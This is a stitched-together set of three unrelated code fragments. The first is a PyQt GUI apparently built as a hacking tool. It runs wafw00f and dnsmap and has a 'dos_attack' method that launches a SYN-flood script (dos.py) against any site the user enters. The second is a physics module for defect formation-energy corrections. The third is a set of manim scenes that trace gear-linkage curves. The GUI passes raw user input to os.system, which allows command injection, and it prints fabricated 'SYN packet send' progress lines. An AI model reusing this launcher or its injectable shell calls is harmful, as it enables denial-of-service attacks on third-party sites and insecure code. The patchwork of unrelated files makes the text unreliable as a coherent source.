msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def firewall_detection(self):
try:
if self.lineEdit_site.text()=="":
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter the site adress or IP adress!")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Firewall detection is starting,please wait...")
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Information)
msg1.setText("Firewall detection is starting,please wait...")
msg1.exec_()
os.system("wafw00f {} -o output.txt".format(self.lineEdit_site.text().lower()))
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
self.plainTextEdit_result.insertPlainText(info)
msg2 = QMessageBox()
msg2.setWindowTitle("Information")
msg2.setBaseSize(300,300)
msg2.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg2.setIcon(QMessageBox.Information)
msg2.setText("Firewall detection is finished.")
msg2.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def dos_attack(self):
try:
if self.lineEdit_site.text()=="":
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Warning)
msg1.setText("Please enter the site adress or IP adress!")
msg1.exec_()
else:
msgbox = QMessageBox(QMessageBox.Question, "Dos Attack", "Doing this attack will make your internet very slow. Are you sure you want to do the attack?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText("Dos Attack is starting,please wait...")
os.system("gnome-terminal --window -x python3 dos.py -s {} -p 80 -t 135".format(self.lineEdit_site.text().lower()))
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setIcon(QMessageBox.Information)
msg.setText("Dos attack is starting...")
msg.exec_()
self.plainTextEdit_result.clear()
for i in range(500):
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.appendPlainText(f"{i}:Denial of service attack, SYN packet send.")
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Dos attack not started!")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def subdomain(self):
try:
if self.lineEdit_site.text()=="":
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Warning)
msg1.setText("Please enter the site adress or IP adress!")
msg1.exec_()
elif self.lineEdit_site.text().startswith("https://www"):
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText("Searching subdomains,please wait...")
os.system("gnome-terminal --window -x dnsmap {} -r output.txt".format(self.lineEdit_site.text().lower()[12:]))
msg2 = QMessageBox()
msg2.setWindowTitle("Information")
msg2.setBaseSize(300,300)
msg2.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg2.setIcon(QMessageBox.Warning)
msg2.setText("Searching subdomains,please wait...")
msg2.exec_()
elif self.lineEdit_site.text().startswith("http://www"):
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText("Searching subdomains,please wait...")
os.system("gnome-terminal --window -x dnsmap {} -r output.txt".format(self.lineEdit_site.text().lower()[11:]))
msg2 = QMessageBox()
msg2.setWindowTitle("Information")
msg2.setBaseSize(300,300)
msg2.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg2.setIcon(QMessageBox.Warning)
msg2.setText("Searching subdomains,please wait...")
msg2.exec_()
self.plainTextEdit_result.clear()
elif self.lineEdit_site.text().startswith("www"):
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText("Searching subdomains,please wait...")
os.system("gnome-terminal --window -x dnsmap {} | |
<filename>pydef_core/formation_energy_corrections.py
import numpy as np
import pydef_core.figure as pf
import pydef_core.basic_functions as bf
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def potential_alignment_correction(host_cell, defect_cell, defects, spheres_radius, plotsphere=True, display_atom_name=False):
    """ Compute the potential alignment correction by calculating the average difference of electrostatic potentials of atoms
    far away from the defects and their images. This is done by considering spheres around the defects and their images with the
    same radius. Only the atoms outside these spheres (so at a minimum distance from a defect) are considered.
    :param host_cell: Cell object of the host cell calculation
    :param defect_cell: Cell object of the defect cell calculation
    :param defects: list of Defect objects
    :param spheres_radius: radius of the spheres in angstrom (float)
    :param plotsphere: if True, then represent the spheres and positions of the atoms
    :param display_atom_name: if True, display the name of each atom on the representation
    :returns: (pot_al, figure) when plotsphere is True,
              else (min_distances, energy_diff, pot_al) """
    # NOTE(review): the containers below are taken by reference and entries are
    # .pop()'d further down, which appears to mutate the Cell objects' data in
    # place -- confirm .atoms_positions/.potentials return fresh copies,
    # otherwise repeated calls on the same cells would fail.
    atoms_pos_d = defect_cell.atoms_positions
    atoms_pos_h = host_cell.atoms_positions
    potentials_h = host_cell.potentials  # electrostatic potentials of the atoms of the host cell
    potentials_d = defect_cell.potentials  # electrostatic potentials of the atoms of the defect cell
    atoms_h = list(host_cell.atoms)  # atoms labels of the host cell (copied)
    atoms_d = list(defect_cell.atoms)  # atoms labels of the defect cell (copied)
    # Positions of the defects and their images (the 6 face-adjacent periodic images)
    defects_position = [f.set_defect_position(atoms_pos_h, atoms_pos_d) for f in defects]  # defects positions
    defect_images_positions = [np.dot(host_cell.cell_parameters, f) for f in
                               [[0, 0, 0], [0, 0, -1], [0, 0, 1], [1, 0, 0],
                                [-1, 0, 0], [0, -1, 0], [0, 1, 0]]]  # relative position of the images of the defects
    defects_positions = [[f + g for g in defect_images_positions]
                         for f in defects_position]  # all positions of the defects and their respective images
    # Removing useless data: atoms involved in the defect itself must not enter
    # the average, so drop their potentials/positions from the relevant cell.
    # NOTE(review): the loop variable "Defect" shadows what looks like a class name.
    for Defect in defects:
        if Defect.defect_type == 'Vacancy':
            potentials_h.pop(Defect.atom[0])  # remove the electrostatic potential of the atom removed from the host cell data
            atoms_h.remove(Defect.atom[0])
        elif Defect.defect_type == 'Interstitial':
            potentials_d.pop(Defect.atom[0])  # remove the electrostatic potential of the atom added from the defect cell data
            atoms_pos_d.pop(Defect.atom[0])  # remove the position of the corresponding atom so the number of positions and potentials match
            atoms_d.remove(Defect.atom[0])
        elif Defect.defect_type == 'Substitutional':
            # Substitution affects one atom in each cell: drop both sides.
            potentials_h.pop(Defect.atom[0])
            potentials_d.pop(Defect.atom[1])
            atoms_pos_d.pop(Defect.atom[1])
            atoms_h.remove(Defect.atom[0])
            atoms_d.remove(Defect.atom[1])
    # Compute the average electrostatic potential outside the spheres
    potentials_list_h = [potentials_h[f] for f in atoms_h]
    potentials_list_d = [potentials_d[f] for f in atoms_d]
    atoms_pos_list_d = [atoms_pos_d[f] for f in atoms_d]
    distances = [np.array([bf.distance(f, g) for f in atoms_pos_list_d])
                 for g in np.concatenate(defects_positions)]  # distance of each atom from each defect
    min_distances = [min(f) for f in np.transpose(distances)]  # minimum distance between an atom and any defect or its image
    index_out = [np.where(f > spheres_radius)[0] for f in distances]  # index of the atoms outside the spheres which centers are the defects
    common_index_out = bf.get_common_values(index_out)  # index of the atoms outside all the spheres radius
    energy_diff = np.array(potentials_list_d) - np.array(potentials_list_h)  # difference of electrostatic energy between the defect and host cells
    pot_al = np.mean(energy_diff[common_index_out])  # average electrostatic difference between the defect and host cells taking into account only the atoms outside the spheres
    if plotsphere is True:
        # 3D representation of the spheres, defect positions and atoms,
        # colour-coded by the per-atom potential difference.
        figure = plt.figure()
        ax = figure.add_axes([0.01, 0.1, 0.45, 0.8], projection='3d', aspect='equal')
        # Display the spheres and defects
        [bf.plot_sphere(spheres_radius, f[0], ax, '-') for f in defects_positions]  # spheres around the defects
        [[bf.plot_sphere(spheres_radius, f, ax, '--') for f in q[1:]] for q in defects_positions]  # spheres around the images of the defects
        [[ax.scatter(f[0], f[1], f[2], color='red', s=400, marker='*') for f in q] for q in defects_positions]  # Position of the defects objects and images
        [[ax.text(f[0], f[1], f[2] + 0.2, s='$' + g.name + '$', ha='center', va='bottom', color='red') for f in q]
         for q, g in zip(defects_positions, defects)]
        # Atoms positions
        atoms_positions = np.transpose(atoms_pos_list_d)
        scatterplot = ax.scatter(atoms_positions[0], atoms_positions[1], atoms_positions[2], s=100, c=energy_diff, cmap='hot', depthshade=False)
        if display_atom_name is True:
            [ax.text(f[0], f[1], f[2], s=g, ha='center', va='bottom') for f, g in zip(atoms_pos_list_d, atoms_d)]
        # Plot parameters
        ax.set_axis_off()
        # X limit is set as the maximum value of the projection of the cristallographic parameters on the x-axe, etc.
        ax.set_xlim(0, np.max(np.transpose(defect_cell.cell_parameters)[0]))
        ax.set_ylim(0, np.max(np.transpose(defect_cell.cell_parameters)[1]))
        ax.set_zlim(0, np.max(np.transpose(defect_cell.cell_parameters)[2]))
        # Colorbar placed just below the 3D axes, in figure-relative coordinates
        temp1 = figure.get_window_extent()
        temp2 = ax.get_window_extent()
        ax_cb = figure.add_axes([temp2.x0 / temp1.x1, temp2.y0 / temp1.y1 - 0.04, (temp2.x1 - temp2.x0) / temp1.x1, 0.03])
        cb = figure.colorbar(scatterplot, cax=ax_cb, orientation='horizontal')
        # NOTE(review): non-raw string with backslash escapes ("\D", "\ ") --
        # works today but should be a raw string r'$\Delta V\ (eV)$'.
        cb.set_label('$\Delta V\ (eV)$')
        return pot_al, figure
    else:
        return min_distances, energy_diff, pot_al
def _set_padded_ylim(ax, values):
    """ Set rounded y-limits on ax with a ~10% margin around the data.
    The sign of each extremum is taken into account so the margin always
    widens the displayed range (a negative minimum is pushed further down,
    a positive minimum pulled closer to zero, and symmetrically for the top).
    :param ax: matplotlib axes to adjust
    :param values: sequence of y-values (NaN entries are ignored) """
    vmin = np.nanmin(values)
    vmax = np.nanmax(values)
    ax.set_ylim(bottom=np.round(vmin * (1.1 if vmin <= 0 else 0.9), 2))
    ax.set_ylim(top=np.round(vmax * (0.9 if vmax <= 0 else 1.1), 2))
def plot_potential_alignment(host_cell, defect_cell, defects, spheres_radius, title_plot, display_atom_name=False):
    """ Draw 3 plots in a same figure
    1) Graphical representation of the positions of the defects and the atoms, and the spheres around the defects
    2) Average electrostatic energy difference between defect and host cells as a function of the spheres radius
    3) Electrostatic energy difference between defect and host cells between each atom as a function of their minimum distance from a defect
    :param host_cell: Cell object of the host cell calculation
    :param defect_cell: Cell object of the defect cell calculation
    :param defects: list of Defect objects
    :param spheres_radius: radius of the spheres in angstrom (float)
    :param title_plot: title of the plot
    :param display_atom_name: if True, display the name of each atom on the representation
    """
    fig = potential_alignment_correction(host_cell, defect_cell, defects, spheres_radius, True, display_atom_name)[1]  # plot the spheres and ions
    min_distances, energy_diff = potential_alignment_correction(host_cell, defect_cell, defects, spheres_radius, False)[0:2]  # minimum distance and potential alignment for each atom
    spheres_radii = np.linspace(0, 1, 100) * np.max(defect_cell.cell_parameters)
    pot_all = [potential_alignment_correction(host_cell, defect_cell, defects, f, False)[-1] for f in spheres_radii]  # mean potential alignment for each spheres radius
    # Average electrostatic energy difference between defect and host cells as a function of the spheres radius
    ax1 = fig.add_subplot(222)
    ax1.plot(spheres_radii, pot_all, 'x', ms=7)
    ax1.axvline(spheres_radius, ls='--', c='g')  # plot a line corresponding to the current sphere radii value
    ax1.set_xlabel(r'Spheres radius $R$ ($\AA$)')
    ax1.set_ylabel(r"$\overline{\Delta V(r>R)}$ ($eV$)")
    _set_padded_ylim(ax1, pot_all)
    # Electrostatic energy difference between defect and host cells between each atom as a function of their minimum distance from a defect
    ax2 = fig.add_subplot(224)
    ax2.plot(min_distances, energy_diff, 'x', ms=7)
    ax2.set_xlabel(r'Distance to the closest defect ($\AA$)')
    ax2.set_ylabel(r"$\Delta V(r)$ ($eV$)")
    ax2.set_xlim(np.min(min_distances)*0.9, np.max(min_distances)*1.02)
    _set_padded_ylim(ax2, energy_diff)
    # Raw string: '\ ' is not a valid escape sequence; the bare form raises a
    # DeprecationWarning and becomes a SyntaxError in future Python versions.
    fig.suptitle('$' + title_plot.replace(' ', r'\ ') + '$', x=0.22)
    # fig.tight_layout() # might be removed to solve the non updating 3d plot
    fig.show()
    # return fig
def get_bands_correction(host_cell, defect_cell, pot_al):
    """ Get the number of electrons and holes in the conduction and valence bands with respect to the host cell """
    bands_data = defect_cell.bands_data
    # Spin-polarised calculations duplicate the k-point weights (halved) and
    # cap each band occupation at 1 instead of 2.
    if defect_cell.ispin == 1:
        kpoints_weights = defect_cell.kpoints_weights
        max_occupation = 2.
    else:
        kpoints_weights = list(defect_cell.kpoints_weights / 2.) * 2
        max_occupation = 1.
    # Align the host band edges with the defect cell via the potential alignment
    cbm_aligned = host_cell.cbm_energy + pot_al
    vbm_aligned = host_cell.vbm_energy + pot_al
    nb_electrons = 0
    nb_holes = 0
    e_donnor = 0
    e_acceptor = 0
    # Accumulate weighted occupations (and occupation-weighted energies)
    # above the aligned CBM / below the aligned VBM.
    for band, weight in zip(bands_data, kpoints_weights):
        energies, occupations = band[0], band[1]
        above_cbm = bf.heaviside(energies - cbm_aligned)
        below_vbm = bf.heaviside(vbm_aligned - energies)
        hole_occ = max_occupation - occupations
        nb_electrons += weight * sum(occupations * above_cbm)
        nb_holes += weight * sum(hole_occ * below_vbm)
        e_donnor -= weight * sum(occupations * (energies - cbm_aligned) * above_cbm)
        e_acceptor -= weight * sum(hole_occ * (vbm_aligned - energies) * below_vbm)
    return e_acceptor, e_donnor, nb_holes, nb_electrons
def band_extrema_correction(host_cell, host_cell_b):
    """ Compute the correction of the band extrema computed with a functional (Host_Cell)
    in order to retrieve the same gap computed with another functional (Host_Cell_B)
    :param host_cell: Cell object of the host cell calculation
    :param host_cell_b: Cell object of the host cell calculation (with a different functional)
    :return: (de_vbm, de_cbm) shifts of the valence and conduction band edges """
    vbm_shift = host_cell_b.vbm_energy - host_cell.vbm_energy
    cbm_shift = host_cell_b.cbm_energy - host_cell.cbm_energy
    return vbm_shift, cbm_shift
def phs_correction(z_h, z_e, de_vbm, de_cbm):
    """ Compute the PHS correction
    :param z_h: number of holes in the PHS
    :param z_e: number of electrons in the PHS
    :param de_vbm: correction of the VBM
    :param de_cbm: correction of the CBM
    :return: (hole correction, electron correction) """
    hole_correction = -z_h * de_vbm
    electron_correction = z_e * de_cbm
    return hole_correction, electron_correction
def vbm_correction(defect_cell, de_vbm):
""" Correction | |
self.play(path.move_to, ORIGIN)
self.play(path.set_height, 7.2, run_time=2)
self.wait(5)
# draw curves without displaying gears and rods
class OnlyCurve(Scene):
    """Render only the coupler curve traced by point D, keeping the gear
    train and linkage rods invisible (their opacity is set to 0).

    NOTE(review): relies on project-local classes ``Virtual_Gear``,
    ``Gear_system`` and ``TracedPath`` -- confirm their API against the
    rest of the file.
    """
    CONFIG = {
        'camera_config': {
            'background_color': WHITE,
        },
        'gears_config':{
            'r1': 3,  # pitch-circle radius of the central gear 1 (scene units)
            'z': [36, 75, 36, 30],  # tooth counts of gears 0..3
            'l': [0.95, 1.25, 0.9, 3.6],  # linkage lengths P3A, P2B, CD, AC
            'a': [PI/6, 40 *DEGREES, PI/2],  # angles phi_A, phi_B, theta_BCD
            'w': 10,  # angular speed factor applied to the gear system
        },
        'step_num': 2000,  # number of simulation steps
        'wait_time': 2.5,  # final pause in seconds
        'stroke_config': {
            'color': BLUE_D,  # traced-curve color
            'width': 1,  # traced-curve stroke width
        },
    }
    def construct(self):
        # Unpack the geometric configuration.
        r1 = self.gears_config['r1']
        z = self.gears_config['z']
        l = self.gears_config['l']
        a = self.gears_config['a']
        z0, z1, z2, z3 = z[0], z[1], z[2], z[3]
        # Pitch radii follow from the tooth-count ratios against gear 1.
        r0, r2, r3 = r1 * z0 / z1, r1 * z2 / z1, r1 * z3 / z1
        center = ORIGIN
        # P2A, P3B, CD, AC = 1., 0.72, 1.6, 2.8
        P3A, P2B, CD, AC = l[0], l[1], l[2], l[3]
        phi_A, phi_B, theta_BCD = a[0], a[1], a[2]
        # Build the four meshing gears; each neighbour is placed one
        # centre-distance (sum of pitch radii) away at a chosen angle.
        gear_1 = Virtual_Gear(pitch_circle_radius=r1, tooth_hight=0.16, tooth_num=z1, inner_radius=0.3, center=center, stroke_color=BLUE)
        gear_0 = Virtual_Gear(pitch_circle_radius=r0, tooth_hight=0.16, tooth_num=z0, inner_radius=0.16, speed=1 * DEGREES,
                              center=gear_1.center + complex_to_R3((r0+r1) * np.exp(-1j * 15 * DEGREES)), stroke_color=RED)
        gear_2 = Virtual_Gear(pitch_circle_radius=r2, tooth_hight=0.16, tooth_num=z2, inner_radius=0.16,
                              center=gear_1.center + complex_to_R3((r1+r2) * np.exp(1j * 3 * PI/4)), stroke_color=GREEN)
        gear_3 = Virtual_Gear(pitch_circle_radius=r3, tooth_hight=0.16, tooth_num=z3, inner_radius=0.16,
                              center=gear_0.center + complex_to_R3((r0+r3) * np.exp(1j * 75 * DEGREES)), stroke_color=PINK)
        gear_1.match_angle(gear_0).match_speed(gear_0)
        gear_2.match_angle(gear_1).match_speed(gear_1)
        gear_3.match_angle(gear_0).match_speed(gear_0)
        # Pivot points A (on gear 3) and B (on gear 2) that drive the rod.
        dot_A = Dot(gear_3.center + complex_to_R3(P3A * np.exp(1j * phi_A)), color=PINK).scale(0.8)
        dot_B = Dot(gear_2.center + complex_to_R3(P2B * np.exp(1j * phi_B)), color=GREEN).scale(0.8)
        rect = Rectangle(height=0.4, width=11.5, stroke_width=2, stroke_color=YELLOW) # .round_corners(0.2)
        hole = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(rect, LEFT).shift(RIGHT * 0.1)
        hole_2 = Dot().set_opacity(0).align_to(rect, RIGHT).shift(LEFT * 0.1)
        line_hole = Rectangle(height=0.18, width=10.5, stroke_width=2, stroke_color=YELLOW).align_to(rect, RIGHT).shift(LEFT * 0.11)
        rod = VGroup(rect, hole, line_hole, hole_2)
        gear_3.add(dot_A), gear_2.add(dot_B)
        # Second rod (pentagon shape) carrying the traced point D.
        poly_5 = Polygon([-0.2, 3., 0], [0.2, 3., 0], [0.2, 0, 0], [0, -0.2 * np.sqrt(3), 0], [-0.2, 0, 0],
                         stroke_width=2, stroke_color=YELLOW) # .round_corners(0.2)
        hole_01 = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, DOWN).shift(UP * 0.1)
        line_hole_01 = Rectangle(height=2.5, width=0.18, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, UP).shift(DOWN * 0.11)
        dot_D = Dot(hole_01.get_center(), color=BLUE).scale(0.8)
        rod_2 = VGroup(poly_5, hole_01, line_hole_01, dot_D).rotate(PI)
        rod_2.shift(hole.get_center()-hole_01.get_center() + AC * RIGHT + CD * UP)
        c0 = Circle(radius=0.18, stroke_width=2, stroke_color=YELLOW).shift(hole.get_center()+AC*RIGHT)
        c1 = Dot(color=YELLOW).scale(0.85).shift(hole.get_center()+AC*RIGHT)
        rods = VGroup(rod, rod_2, VGroup(c0, c1))
        def update_rod(r):
            # Keep the rod pinned to A and aligned with the A->B direction.
            r.shift(dot_A.get_center() - hole.get_center())
            AB = dot_B.get_center() - dot_A.get_center()
            vect_old = hole_2.get_center() - hole.get_center()
            r.rotate(np.angle(complex(*AB[:2]))-np.angle(complex(*vect_old[:2])), about_point=hole.get_center())
        rods.add_updater(update_rod)
        gears = Gear_system(gear_0, gear_1, gear_2, gear_3)
        # gears.update_gears()
        path = TracedPath(dot_D.get_center, stroke_color=self.stroke_config['color'],
                          min_distance_to_new_point=0.02, stroke_width=self.stroke_config['width'])
        # Rotate the already-traced path along with gear 1 so the curve is
        # drawn in the rotating frame of the gear train.
        path.add_updater(lambda p: p.rotate(gears.w.get_value() * gear_1.speed, about_point=gear_1.center))
        self.add(gears, rods, path)
        # Hide the mechanism; only the traced curve remains visible.
        gears.set_opacity(0)
        rods.set_opacity(0)
        self.wait(1)
        gears.w.set_value(self.gears_config['w'])
        self.wait(1/60)
        for i in range(self.step_num):
            for g in gears:
                g.rotate_gear(g.speed * gears.w.get_value())
            # Emit one frame per full revolution of gear 1; otherwise advance
            # the simulation without rendering (wait(0)).
            if i % int(PI * 2 / (gears.w.get_value() * gear_1.speed)) == 0:
                self.wait(1/self.camera.frame_rate)
                # self.wait(0)
            else:
                self.wait(0)
            print('step_%d' % i, end='\t')
            print('frame_%d' % int(abs(i / int(PI * 2 / (gears.w.get_value() * gear_1.speed)))))
        self.wait(self.wait_time)
class OnlyCurve_mode01(OnlyCurve):
    """Alias scene for OnlyCurve: inherits everything, overrides no config."""
    CONFIG = {}
class OnlyCurve_mode01_2(Scene):
    """Variant of OnlyCurve with pivots A/B swapped between gears 2 and 3
    (A on gear 2, B on gear 3), rounded rod corners, and the traced rod_2
    mounted without the PI rotation (D sits below the coupler, CD * DOWN).
    """
    CONFIG = {
        'camera_config': {
            'background_color': WHITE,
        },
        'gears_config':{
            'r1': 3,  # pitch-circle radius of the central gear 1
            'z': [36, 75, 36, 30],  # tooth counts of gears 0..3
            'l': [0.95, 1.25, 0.9, 3.6],  # linkage lengths P2A, P3B, CD, AC
            'a': [PI/6, 40 *DEGREES, PI/2],  # angles phi_A, phi_B, theta_BCD
            'w': 10,  # angular speed factor
        },
        'step_num': 2000,
        'wait_time': 2.5,
        'stroke_config': {
            'color': BLUE_D,
            'width': 1,
        },
    }
    def construct(self):
        # Unpack the geometric configuration.
        r1 = self.gears_config['r1']
        z = self.gears_config['z']
        l = self.gears_config['l']
        a = self.gears_config['a']
        z0, z1, z2, z3 = z[0], z[1], z[2], z[3]
        r0, r2, r3 = r1 * z0 / z1, r1 * z2 / z1, r1 * z3 / z1
        center = ORIGIN
        # P2A, P3B, CD, AC = 1., 0.72, 1.6, 2.8
        P2A, P3B, CD, AC = l[0], l[1], l[2], l[3]
        phi_A, phi_B, theta_BCD = a[0], a[1], a[2]
        gear_1 = Virtual_Gear(pitch_circle_radius=r1, tooth_hight=0.16, tooth_num=z1, inner_radius=0.3, center=center, stroke_color=BLUE)
        gear_0 = Virtual_Gear(pitch_circle_radius=r0, tooth_hight=0.16, tooth_num=z0, inner_radius=0.16, speed=1 * DEGREES,
                              center=gear_1.center + complex_to_R3((r0+r1) * np.exp(-1j * 15 * DEGREES)), stroke_color=RED)
        gear_2 = Virtual_Gear(pitch_circle_radius=r2, tooth_hight=0.16, tooth_num=z2, inner_radius=0.16,
                              center=gear_1.center + complex_to_R3((r1+r2) * np.exp(1j * 3 * PI/4)), stroke_color=GREEN)
        gear_3 = Virtual_Gear(pitch_circle_radius=r3, tooth_hight=0.16, tooth_num=z3, inner_radius=0.16,
                              center=gear_0.center + complex_to_R3((r0+r3) * np.exp(1j * 75 * DEGREES)), stroke_color=PINK)
        gear_1.match_angle(gear_0).match_speed(gear_0)
        gear_2.match_angle(gear_1).match_speed(gear_1)
        gear_3.match_angle(gear_0).match_speed(gear_0)
        # Pivots: A on gear 2 and B on gear 3 (swapped w.r.t. OnlyCurve).
        dot_A = Dot(gear_2.center + complex_to_R3(P2A * np.exp(1j * phi_A)), color=GREEN).scale(0.8)
        dot_B = Dot(gear_3.center + complex_to_R3(P3B * np.exp(1j * phi_B)), color=PINK).scale(0.8)
        rect = Rectangle(height=0.4, width=11, stroke_width=2, stroke_color=YELLOW).round_corners(0.2)
        hole = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(rect, LEFT).shift(RIGHT * 0.1)
        hole_2 = Dot().set_opacity(0).align_to(rect, RIGHT).shift(LEFT * 0.1)
        line_hole = Rectangle(height=0.18, width=10, stroke_width=2, stroke_color=YELLOW).round_corners(0.09).align_to(rect, RIGHT).shift(LEFT * 0.11)
        rod = VGroup(rect, hole, line_hole, hole_2)
        gear_2.add(dot_A), gear_3.add(dot_B)
        # Second rod (pentagon shape) carrying the traced point D.
        poly_5 = Polygon([-0.2, 3., 0], [0.2, 3., 0], [0.2, 0, 0], [0, -0.2 * np.sqrt(3), 0], [-0.2, 0, 0],
                         stroke_width=2, stroke_color=YELLOW).round_corners(0.2)
        hole_01 = Circle(radius=0.1, stroke_width=2, stroke_color=YELLOW).align_to(poly_5, DOWN).shift(UP * 0.1)
        line_hole_01 = Rectangle(height=2.5, width=0.18, stroke_width=2, stroke_color=YELLOW).round_corners(0.09).align_to(poly_5, UP).shift(DOWN * 0.11)
        dot_D = Dot(hole_01.get_center(), color=BLUE).scale(0.8)
        rod_2 = VGroup(poly_5, hole_01, line_hole_01, dot_D)
        rod_2.shift(hole.get_center()-hole_01.get_center() + AC * RIGHT + CD * DOWN)
        c0 = Circle(radius=0.18, stroke_width=2, stroke_color=YELLOW).shift(hole.get_center()+AC*RIGHT)
        c1 = Dot(color=YELLOW).scale(0.85).shift(hole.get_center()+AC*RIGHT)
        rods = VGroup(rod, rod_2, VGroup(c0, c1))
        def update_rod(r):
            # Keep the rod pinned to A and aligned with the A->B direction.
            r.shift(dot_A.get_center() - hole.get_center())
            AB = dot_B.get_center() - dot_A.get_center()
            vect_old = hole_2.get_center() - hole.get_center()
            r.rotate(np.angle(complex(*AB[:2]))-np.angle(complex(*vect_old[:2])), about_point=hole.get_center())
        rods.add_updater(update_rod)
        gears = Gear_system(gear_0, gear_1, gear_2, gear_3)
        # gears.update_gears()
        path = TracedPath(dot_D.get_center, stroke_color=self.stroke_config['color'],
                          min_distance_to_new_point=0.02, stroke_width=self.stroke_config['width'])
        # Rotate the traced path with gear 1 so the curve is drawn in the
        # rotating frame of the gear train.
        path.add_updater(lambda p: p.rotate(gears.w.get_value() * gear_1.speed, about_point=gear_1.center))
        self.add(gears, rods, path)
        # Hide the mechanism; only the traced curve remains visible.
        gears.set_opacity(0)
        rods.set_opacity(0)
        self.wait(1)
        gears.w.set_value(self.gears_config['w'])
        self.wait(1/60)
        for i in range(self.step_num):
            for g in gears:
                g.rotate_gear(g.speed * gears.w.get_value())
            # Emit one frame per full revolution of gear 1; otherwise advance
            # the simulation without rendering (wait(0)).
            if i % int(PI * 2 / (gears.w.get_value() * gear_1.speed)) == 0:
                self.wait(1/self.camera.frame_rate)
                # self.wait(0)
            else:
                self.wait(0)
            print('step_%d' % i, end='\t')
            print('frame_%d' % int(abs(i / int(PI * 2 / (gears.w.get_value() * gear_1.speed)))))
        self.wait(self.wait_time)
class OnlyCurve_mode02(Scene):
    """Variant of OnlyCurve where gear 3 meshes with gear 1 (not gear 0) and
    gear 2 sits at 150 degrees; tooth counts and linkage lengths also differ.
    """
    CONFIG = {
        'camera_config': {
            'background_color': WHITE,
        },
        'gears_config':{
            'r1': 3,  # pitch-circle radius of the central gear 1
            'z': [36, 75, 36, 45],  # tooth counts of gears 0..3
            'l': [1.5, 1.25, 0.9, 3.6],  # linkage lengths P3A, P2B, CD, AC
            'a': [PI/6, 40 *DEGREES, PI/2],  # angles phi_A, phi_B, theta_BCD
            'w': 10,  # angular speed factor
        },
        'step_num': 2000,
        'wait_time': 2.5,
        'stroke_config': {
            'color': BLUE_D,
            'width': 1,
        },
    }
    def construct(self):
        # Unpack the geometric configuration.
        r1 = self.gears_config['r1']
        z = self.gears_config['z']
        l = self.gears_config['l']
        a = self.gears_config['a']
        z0, z1, z2, z3 = z[0], z[1], z[2], z[3]
        r0, r2, r3 = r1 * z0 / z1, r1 * z2 / z1, r1 * z3 / z1
        center = ORIGIN
        # P2A, P3B, CD, AC = 1., 0.72, 1.6, 2.8
        P3A, P2B, CD, AC = l[0], l[1], l[2], l[3]
        phi_A, phi_B, theta_BCD = a[0], a[1], a[2]
        gear_1 = Virtual_Gear(pitch_circle_radius=r1, tooth_hight=0.16, tooth_num=z1, inner_radius=0.3, center=center, stroke_color=BLUE)
        gear_0 = Virtual_Gear(pitch_circle_radius=r0, tooth_hight=0.16, tooth_num=z0, inner_radius=0.16, speed=1 * DEGREES,
                              center=gear_1.center + complex_to_R3((r0+r1) * np.exp(-1j * 15 * DEGREES)), stroke_color=RED)
        gear_2 = Virtual_Gear(pitch_circle_radius=r2, tooth_hight=0.16, tooth_num=z2, inner_radius=0.16,
                              center=gear_1.center + complex_to_R3((r1+r2) * np.exp(1j * 150 * DEGREES)), stroke_color=GREEN)
        # gear_3 is different from mode_01
        gear_3 = Virtual_Gear(pitch_circle_radius=r3, tooth_hight=0.16, tooth_num=z3, inner_radius=0.16,
                              center=gear_1.center + complex_to_R3((r1+r3) * np.exp(1j * 45 * DEGREES)), stroke_color=PINK)
        gear_1.match_angle(gear_0).match_speed(gear_0)
        gear_2.match_angle(gear_1).match_speed(gear_1)
        gear_3.match_angle(gear_0).match_speed(gear_0)
        # Pivot points A (on gear 3) and B (on gear 2) that drive the rod.
